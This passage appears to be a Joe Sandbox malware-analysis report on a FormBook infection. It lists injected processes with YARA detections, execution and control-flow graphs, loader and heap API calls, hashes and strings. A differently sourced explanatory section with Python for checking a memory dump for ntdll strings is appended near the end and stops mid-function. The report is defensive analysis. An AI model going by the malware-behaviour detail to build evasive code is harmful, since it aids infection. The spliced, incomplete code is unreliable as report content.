                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:12
                                                                                                                Start time:09:58:23
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\SysWOW64\typeperf.exe"
                                                                                                                Imagebase:0xd90000
                                                                                                                File size:41'984 bytes
                                                                                                                MD5 hash:93925D4F55465CFC73C4CDF7F8B1F375
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:moderate
                                                                                                                Has exited:false

                                                                                                                Target ID:14
                                                                                                                Start time:09:58:37
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe"
                                                                                                                Imagebase:0xfa0000
                                                                                                                File size:140'800 bytes
                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:16
                                                                                                                Start time:09:58:49
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                Imagebase:0x7ff722870000
                                                                                                                File size:676'768 bytes
                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true


                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:1.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                                                  Signature Coverage:8.3%
                                                                                                                  Total number of Nodes:120
                                                                                                                  Total number of Limit Nodes:7
                                                                                                                  execution_graph 77021 42bd23 77022 42bd3d 77021->77022 77025 3c72df0 LdrInitializeThunk 77022->77025 77023 42bd65 77025->77023 77026 424e83 77027 424e9c 77026->77027 77028 424ee7 77027->77028 77031 424f2a 77027->77031 77033 424f2f 77027->77033 77034 42e7f3 77028->77034 77032 42e7f3 RtlFreeHeap 77031->77032 77032->77033 77037 42ca83 77034->77037 77036 424ef7 77038 42caa0 77037->77038 77039 42cab1 RtlFreeHeap 77038->77039 77039->77036 77046 42fa13 77047 42e7f3 RtlFreeHeap 77046->77047 77048 42fa28 77047->77048 77049 42e8d3 77052 42ca33 77049->77052 77051 42e8ee 77053 42ca4d 77052->77053 77054 42ca5e RtlAllocateHeap 77053->77054 77054->77051 77055 424af3 77056 424b0f 77055->77056 77057 424b37 77056->77057 77058 424b4b 77056->77058 77059 42c723 NtClose 77057->77059 77065 42c723 77058->77065 77061 424b40 77059->77061 77062 424b54 77068 42e913 RtlAllocateHeap 77062->77068 77064 424b5f 77066 42c740 77065->77066 77067 42c751 NtClose 77066->77067 77067->77062 77068->77064 77069 414173 77070 41418d 77069->77070 77075 417903 77070->77075 77072 4141ab 77073 4141f0 77072->77073 77074 4141df PostThreadMessageW 77072->77074 77074->77073 77076 417927 77075->77076 77077 41792e 77076->77077 77078 417973 LdrLoadDll 77076->77078 77077->77072 77078->77077 77079 41b433 77080 41b466 77079->77080 77081 42c723 NtClose 77080->77081 77082 41b498 77080->77082 77081->77082 77083 41e633 77084 41e659 77083->77084 77088 41e74d 77084->77088 77089 42fa53 RtlAllocateHeap RtlFreeHeap 77084->77089 77086 41e6eb 77086->77088 77090 42bd73 77086->77090 77089->77086 77091 42bd90 77090->77091 77094 3c72c0a 77091->77094 77092 42bdbc 77092->77088 77095 3c72c11 77094->77095 77096 3c72c1f LdrInitializeThunk 77094->77096 77095->77092 77096->77092 77040 414204 77041 4141b6 77040->77041 77044 41420f 77040->77044 77042 4141f0 77041->77042 77043 4141df PostThreadMessageW 77041->77043 77043->77042 77097 
401a95 77098 401a99 77097->77098 77101 42fe83 77098->77101 77104 42e3a3 77101->77104 77105 42e3c9 77104->77105 77116 407523 77105->77116 77107 42e3df 77115 401b89 77107->77115 77119 41b243 77107->77119 77109 42e3fe 77110 42e413 77109->77110 77134 42cad3 77109->77134 77130 4283f3 77110->77130 77113 42e42d 77114 42cad3 ExitProcess 77113->77114 77114->77115 77118 407530 77116->77118 77137 4165b3 77116->77137 77118->77107 77120 41b26f 77119->77120 77148 41b133 77120->77148 77123 41b2b4 77125 41b2d0 77123->77125 77128 42c723 NtClose 77123->77128 77124 41b29c 77126 41b2a7 77124->77126 77127 42c723 NtClose 77124->77127 77125->77109 77126->77109 77127->77126 77129 41b2c6 77128->77129 77129->77109 77131 428455 77130->77131 77133 428462 77131->77133 77159 418773 77131->77159 77133->77113 77135 42caf0 77134->77135 77136 42cb01 ExitProcess 77135->77136 77136->77110 77138 4165d0 77137->77138 77140 4165e9 77138->77140 77141 42d173 77138->77141 77140->77118 77143 42d18d 77141->77143 77142 42d1bc 77142->77140 77143->77142 77144 42bd73 LdrInitializeThunk 77143->77144 77145 42d21c 77144->77145 77146 42e7f3 RtlFreeHeap 77145->77146 77147 42d235 77146->77147 77147->77140 77149 41b229 77148->77149 77150 41b14d 77148->77150 77149->77123 77149->77124 77154 42be13 77150->77154 77153 42c723 NtClose 77153->77149 77155 42be30 77154->77155 77158 3c735c0 LdrInitializeThunk 77155->77158 77156 41b21d 77156->77153 77158->77156 77160 41879d 77159->77160 77161 42e7f3 RtlFreeHeap 77160->77161 77164 418c9b 77160->77164 77162 4188d6 77161->77162 77163 42cad3 ExitProcess 77162->77163 77162->77164 77163->77164 77164->77133 77045 3c72b60 LdrInitializeThunk 77165 418eb8 77166 42c723 NtClose 77165->77166 77167 418ec2 77166->77167
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID: )F$2b$I$K_$m~
• API String ID: 0-409131162
• Opcode ID: 81eb4d4ce7ba30cbbb4e804efc00288aba6f8940184d0f56b8887f88f96e5ed0
• Instruction ID: 5c77b32fdf5f580625ca62357abd71528a00badf8bbe157a9e88a45299b38899
• Opcode Fuzzy Hash: 81eb4d4ce7ba30cbbb4e804efc00288aba6f8940184d0f56b8887f88f96e5ed0
• Instruction Fuzzy Hash: D51299769012828BC7219F74C8542DAFFB1FF96704B1845BFD491AF3A2D33A5846CB89

Control-flow Graph
control_flow_graph 242 418773-4187e7 call 42e893 * 3 call 404bb3 call 424493 253 418ca6-418caa 242->253 254 4187ed-418817 call 42e843 242->254 257 418822 254->257 258 418819-418820 254->258 259 418824-41882e 257->259 258->259 260 418830 259->260 261 41884f-418861 call 4244c3 259->261 262 418833-418836 260->262 268 418ca4-418ca5 261->268 269 418867-41887f call 42e1f3 261->269 264 418838-41883b 262->264 265 41883f-418849 262->265 264->262 267 41883d 264->267 265->261 267->261 268->253 269->268 272 418885-4188c9 call 413de3 269->272 272->268 275 4188cf-4188ef call 42e7f3 272->275 278 4188f1-4188f3 275->278 279 418920-418922 275->279 281 41892b-41894d call 41b2e3 278->281 282 4188f5-418903 call 42dd63 call 407063 278->282 280 418924 279->280 279->281 280->281 281->268 287 418953-418975 call 42bf43 281->287 290 418908-41890d 282->290 291 41897a-41897f 287->291 290->279 292 41890f-41891e 290->292 291->268 293 418985-4189fc call 42b8e3 call 42b993 call 42e843 291->293 292->293 300 418a05 293->300 301 4189fe-418a03 293->301 302 418a07-418a37 300->302 301->302 303 418a3d 302->303 304 418b1f 302->304 305 418a43-418a49 303->305 306 418b21 304->306 307 418a4b-418a4e 305->307 308 418a5a-418a7b call 42e843 305->308 309 418b28-418b2c 306->309 307->305 310 418a50-418a55 307->310 316 418a87 308->316 317 418a7d-418a85 308->317 312 418b32-418b36 309->312 313 418b2e-418b30 309->313 310->306 312->309 313->312 315 418b38-418b4c 313->315 318 418bb9-418c09 call 417883 * 2 call 42e813 315->318 319 418b4e-418b51 315->319 320 418a8a-418a9f 316->320 317->320 322 418b54-418b59 319->322 325 418aa1 320->325 326 418ab2-418af3 call 417803 call 42e843 320->326 323 418b70-418b74 322->323 324 418b5b-418b5e 322->324 323->322 331 418b76-418b78 323->331 324->323 330 418b60-418b62 324->330 332 418aa4-418aa7 325->332 348 418af5-418afa 326->348 349 418afc 326->349 330->323 335 418b64-418b67 330->335 331->318 336 418b7a-418b83 331->336 337 418ab0 332->337 338 418aa9-418aac 332->338 335->323 341 418b69 335->341 342 418b85-418b88 336->342 337->326 338->332 343 418aae 338->343 341->323 346 418bb3-418bb7 342->346 347 418b8a-418b8d 342->347 343->326 346->318 346->342 347->346 352 418b8f-418b91 347->352 353 418afe-418b1d call 414d33 348->353 349->353 354 418c11-418c22 call 4070d3 350->354 355 418c3b-418c4d call 42baf3 350->355 351->355 356 418c35 351->356 352->346 357 418b93-418b96 352->357 353->306 362 418c27-418c2c 354->362 365 418c53-418c68 call 41b4b3 355->365 356->355 357->346 361 418b98-418bb1 357->361 361->346 362->351 362->365 368 418c6a-418c96 call 417803 * 2 call 42cad3 365->368 374 418c9b-418c9e 368->374 374->268
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID: >$>
• API String ID: 0-3778932101
• Opcode ID: ca422f8d884042845518030b4bc6570aed558962bb3f05b996a0a83d81ac827b
• Instruction ID: fcfb32f9a52c9894804c28a7b06b074eca563cc1d4dee10d1b80ef1207b7c0fa
• Opcode Fuzzy Hash: ca422f8d884042845518030b4bc6570aed558962bb3f05b996a0a83d81ac827b
• Instruction Fuzzy Hash: 6FF1A4B0D00219AFDF24DFA5CC85AEEB7B8AF44304F1481AEE505A7341DB746A85CFA5

Control-flow Graph
control_flow_graph 462 417903-41792c call 42f4f3 465 417932-417940 call 42faf3 462->465 466 41792e-417931 462->466 469 417950-417953 465->469 470 417942-41794d call 42fd93 465->470 472 417959-417961 469->472 473 417954 call 42de73 469->473 470->469 476 417963-417977 LdrLoadDll 472->476 477 41797a-41797d 472->477 473->472 476->477
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417975
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: d8763b518fa0a11acd9d080d14419e451ef2295721058bd5ab11b5c6820eec4f
• Instruction ID: 463929d66597bbdaf13c54431a151a5f51b2f75f5e6c757c6cf807a4193d1843
• Opcode Fuzzy Hash: d8763b518fa0a11acd9d080d14419e451ef2295721058bd5ab11b5c6820eec4f
• Instruction Fuzzy Hash: 740152F1E4020DA7DB10DBE5DC42FDEB778AB14308F4041A6E90897240F675EB488B95

Control-flow Graph
control_flow_graph 484 42c723-42c75f call 404973 call 42d963 NtClose
APIs
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C75A
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 1c2f88292d7e2c6a30bddc2025e466cfd1a3a60594c20167d31e2f8787f4076b
• Instruction ID: 31899bdf6a2e9aaa1cbd5152e6067e72ddadf3aca3993b7b6181c46ac3afa756
• Opcode Fuzzy Hash: 1c2f88292d7e2c6a30bddc2025e466cfd1a3a60594c20167d31e2f8787f4076b
• Instruction Fuzzy Hash: 91E08C763402147BD620EA6ADC42F9BB76DDFC5B14F00442BFA18A7242CAB1B91187F4
APIs
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
• Instruction ID: f1b3a564e57d8db6d791bfe30329b27628126f33dd2ff5f3408a1d0e42f20d15
• Opcode Fuzzy Hash: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
• Instruction Fuzzy Hash: 7D90027160560802D101B2584554786100687D0705FA6C411A042C5ACD87958B5165A2
APIs
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
• Instruction ID: a7d954574f12c2a64cadd64d7e6835217944f3637fb12dd8db4a44f45c985589
• Opcode Fuzzy Hash: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
• Instruction Fuzzy Hash: B09002A1202504034106B2584454696400B87E0705B96C021E101C5D4DC6258A916125
APIs
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
• Instruction ID: 4f6675d3e3273099332e0c4ed8d15174d0278e718619d66f0ff73dc14f53d2cb
• Opcode Fuzzy Hash: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
• Instruction Fuzzy Hash: 4590027120150813D112B2584544787000A87D0745FD6C412A042C59CD97568B52A121

Control-flow Graph
control_flow_graph 182 414128-41413a 183 414168-4141dd call 42e893 call 42f2a3 call 417903 call 4048e3 call 424fa3 182->183 184 41413c-414154 182->184 202 4141fd-414203 183->202 203 4141df-4141ee PostThreadMessageW 183->203 185 414156-414167 184->185 186 4140e9-4140f1 184->186 189 4140f6 186->189 189->189 191 4140f8-414154 189->191 191->185 191->186 203->202 204 4141f0-4141fa 203->204 204->202
APIs
• PostThreadMessageW.USER32(f3663-3k,00000111,00000000,00000000), ref: 004141EA
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: f3663-3k$f3663-3k
• API String ID: 1836367815-2354389040
• Opcode ID: 47312413de178957428d925b024ec15ed4e39c45a3154b119c275579456fc2a9
• Instruction ID: 57b80eca45ddfb112378365bc78925cdd0f091db6c467c713822f1da91ed0ddf
• Opcode Fuzzy Hash: 47312413de178957428d925b024ec15ed4e39c45a3154b119c275579456fc2a9
• Instruction Fuzzy Hash: 89216A72D4421D7BE710D6959C82DFFBBACDF813A4F4041AAFD08B3240D6284E0A87E5

Control-flow Graph
control_flow_graph 205 414173-4141dd call 42e893 call 42f2a3 call 417903 call 4048e3 call 424fa3 216 4141fd-414203 205->216 217 4141df-4141ee PostThreadMessageW 205->217 217->216 218 4141f0-4141fa 217->218 218->216
APIs
• PostThreadMessageW.USER32(f3663-3k,00000111,00000000,00000000), ref: 004141EA
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: f3663-3k$f3663-3k
• API String ID: 1836367815-2354389040
• Opcode ID: 1b6dd2371718b4a0b8c46f5a51aec603c5353fed8517a1ee872ff57ce09fc1d7
• Instruction ID: cbdef109c2b9b07798291e43b3e3ae66cf79e94bce95d6dec6f2eff81f21801d
• Opcode Fuzzy Hash: 1b6dd2371718b4a0b8c46f5a51aec603c5353fed8517a1ee872ff57ce09fc1d7
• Instruction Fuzzy Hash: 3301E1B2D0011C7AEB00AAE19C82DEF7B7CDB81398F408069BA1467240D6684E0A47F1

Control-flow Graph
control_flow_graph 219 414204-41420d 220 4141b6-4141bb 219->220 221 41420f-414219 219->221 227 4141c1-4141dd 220->227 228 4141bc call 424fa3 220->228 223 41421b-41421f 221->223 225 414221-414226 223->225 226 41423d-414243 223->226 225->226 229 414228-41422d 225->229 226->223 230 414245-414248 226->230 231 4141fd-414203 227->231 232 4141df-4141ee PostThreadMessageW 227->232 228->227 229->226 233 41422f-414236 229->233 232->231 234 4141f0-4141fa 232->234 235 414249-41424c 233->235 236 414238-41423b 233->236 234->231 236->226 236->235
APIs
• PostThreadMessageW.USER32(f3663-3k,00000111,00000000,00000000), ref: 004141EA
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: f3663-3k$f3663-3k
• API String ID: 1836367815-2354389040
• Opcode ID: 87b90ca90d2aef138502aba0da3305d66568e9920b47b088628ceb59326d936e
• Instruction ID: 77328fe590cc0aeeb2a76a46f2bb0c730a7ded943ba59cd829b5b86977ee54ce
• Opcode Fuzzy Hash: 87b90ca90d2aef138502aba0da3305d66568e9920b47b088628ceb59326d936e
• Instruction Fuzzy Hash: 5A115C7191424839DB304AB44C91CEB7B7CDACA3A4B4843DAF95487391C3398CC78755

Control-flow Graph
control_flow_graph 237 42ca83-42cac7 call 404973 call 42d963 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CAC2
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: GfA
• API String ID: 3298025750-3102277488
• Opcode ID: fee22c70c48bf49024c0c7ee0c89e9249b1d52017c9b24d8fec10191ff4b523f
• Instruction ID: 5cbfc12d9832714acbc2873c89cf4bc191619a9535280a7325d26089e5f3cd42
• Opcode Fuzzy Hash: fee22c70c48bf49024c0c7ee0c89e9249b1d52017c9b24d8fec10191ff4b523f
• Instruction Fuzzy Hash: ABE06DB12002057BC610EE99DC41E9B37ACDFC8710F40441AF908A7242CA75B910C7B8

Control-flow Graph (graph image not included; basic blocks listed)
• Entry 4178f7; 19 basic blocks between 417897 and 41797d, four of them self-looping (41789a-4178a1, 4178b3-4178ba, 4178d6-4178dd, 4178e9-4178f0)
• Blocks with calls: 4178bc-4178cd call 417623; 41794a-417961 call 42de73; 417973-417977 LdrLoadDll
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417975
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 2ef6c9470a1ee21cb33d2bb9bdb88f05293757dec9739a761deb81b3b822c429
• Instruction ID: 5a5dfc79b01cc52691c3650746e7fedc7cc37b96ebd393a04756661f1823cbed
• Opcode Fuzzy Hash: 2ef6c9470a1ee21cb33d2bb9bdb88f05293757dec9739a761deb81b3b822c429
• Instruction Fuzzy Hash: 75113A31D0C1865EEB11EB18D898BFDBB71EF56208F0801DBE8888B253E926998CC755

Control-flow Graph (graph image not included; basic blocks listed)
• Entry 4179b1; 17 basic blocks between 417961 and 417adf; the blocks 417961, 417963-417971, 417973-417977 and 41797a-41797d are shared with the 4178f7 graph above (same LdrLoadDll call site)
• Blocks with calls: 417973-417977 LdrLoadDll; 417a7a-417a8b call 42f553; 417a8d-417abe call 42f553, call 42b713; 417abf-417adf call 42b713
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417975
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: f88cb81a74db75b46b352572e01ae66e1a7b29122a00a59ca399e53127685873
• Instruction ID: aa99d62753baf914b96a6fe2fb545f555e00b53280b927957bec337b59d5ec07
• Opcode Fuzzy Hash: f88cb81a74db75b46b352572e01ae66e1a7b29122a00a59ca399e53127685873
• Instruction Fuzzy Hash: 4A114C75554105AFDB10CE68C8C6ADD7B70FF12314F248396D816DB582C335958BC685

Control-flow Graph (graph image not included; basic blocks listed)
• 42ca33-42ca74 (single block): call 404973, call 42d963, RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,?,?), ref: 0042CA6F
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 599ca950bc8f169c71cba67ae82da6feebaca764728b68fca45a6d3234b8bbdf
• Instruction ID: eeebabae217029cdcc264359d531b3e72f878c51ecf9e81678dbc4f9f50571ff
• Opcode Fuzzy Hash: 599ca950bc8f169c71cba67ae82da6feebaca764728b68fca45a6d3234b8bbdf
• Instruction Fuzzy Hash: 9DE06DB22002057BC614EE59DC41EDB73ADDFC5714F00402AFA08A7241DA71B911CBB8

Control-flow Graph (graph image not included; basic blocks listed)
• 42cad3-42cb0f (single block): call 404973, call 42d963, ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,0B993897,?,?,0B993897), ref: 0042CB0A
Memory Dump Source
• Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 15d7165cc788577510ac71ca48b0bcbc26da289298ee6bd827b7d81804111150
• Instruction ID: 8e5617cf027397ce6c886203216bd8e952ae4f09c2aac6b337be60386c44fe0d
• Opcode Fuzzy Hash: 15d7165cc788577510ac71ca48b0bcbc26da289298ee6bd827b7d81804111150
• Instruction Fuzzy Hash: 2FE04F71200215BBD620BA6AEC41F9B775CDFC5714F00402AFA0967241C6B0B90087F4

Control-flow Graph (graph image not included; basic blocks listed)
• Entry 3c72c0a-3c72c0f; 3 basic blocks; successors 3c72c11-3c72c18 and 3c72c1f-3c72c26 LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
• Instruction ID: 84faa90233bd227a4f600780950a8624567ebc6a859d33608038aac95c8ba62c
• Opcode Fuzzy Hash: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
• Instruction Fuzzy Hash: 73B09BB19015C5C5EA11F7604608757790567D0745F5AC461D303C685E4739C2D1E175
Strings
Memory Dump Source
• Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
• Instruction ID: aeea6575664b303b0d03bbeb9d9d32d519b3d40015c05f24726aacc197937762
• Opcode Fuzzy Hash: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
• Instruction Fuzzy Hash: E0928A75608381AFD720DE25C884BABB7F8BB88754F084D2DFA95DB250D770E944CB92
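The strings recovered from the region dumped at 0x03C00000 in process 9 (svchost) are ntdll's own: source paths under minkernel\ntdll\ and Ldrp* loader internals such as LdrpInitializeExecutionOptions, and the dump is marked "based on PE: true". Before treating that region as a second ntdll image inside the process, an analyst would want to confirm both facts on the raw dump: that it starts with a valid MZ/PE32 header and that it carries several ntdll-only strings, not just one stray string in heap data. The following Python is an added example of that check; it is not Joe Sandbox code. The marker strings are taken from the listings above, while the PE32 builder, the three regions it classifies and the header ImageBase 0x77000000 are constructed test inputs, not values from the real dump.

```python
"""Check whether a dumped memory region is a PE32 image carrying ntdll-internal
strings. Added example, not Joe Sandbox code; every input below is constructed."""
import struct

# Marker strings taken from the report's listings for the 0x03C00000 region.
# Source paths under minkernel\ntdll\ and Ldrp* names only occur in ntdll itself.
NTDLL_MARKERS = (
    b"minkernel\\ntdll\\ldrinit.c",
    b"minkernel\\ntdll\\ldrapi.c",
    b"LdrpInitializeExecutionOptions",
    b"LdrpGetShimEngineInterface",
    b"LdrpFindLoadedDllInternal",
)


def find_all(hay: bytes, needle: bytes) -> list:
    """All offsets of needle in hay."""
    hits, i = [], hay.find(needle)
    while i != -1:
        hits.append(i)
        i = hay.find(needle, i + 1)
    return hits


def parse_pe_headers(region: bytes):
    """Parse MZ/PE32 headers at the start of a dumped region; None if absent or malformed."""
    if len(region) < 0x40 or region[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", region, 0x3C)[0]
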